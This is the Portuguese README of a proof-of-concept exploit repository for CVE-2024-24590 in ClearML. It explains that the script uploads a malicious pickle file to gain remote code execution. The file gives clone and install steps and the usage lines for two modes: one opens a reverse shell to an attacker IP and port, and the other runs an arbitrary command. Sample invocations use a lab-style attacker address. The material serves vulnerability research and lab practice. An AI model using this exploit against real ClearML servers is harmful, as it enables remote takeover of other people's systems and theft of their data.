
CVE-2024-24590 ClearML RCE&CMD POC
Este repositório contém um script de exploração em Python para a CVE-2024-24590. O script foi projetado para carregar um arquivo pickle malicioso para o ClearML, que executa um shell reverso ou um comando personalizado.
Clone o repositório:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
Instale o ClearML SDK:
pip install clearml
clearml-init
O script suporta dois modos de operação: default e cmd.
Neste modo, você deve fornecer o IP e a porta do atacante para estabelecer um shell reverso.
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
Neste modo, você pode fornecer um comando personalizado a ser executado.
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"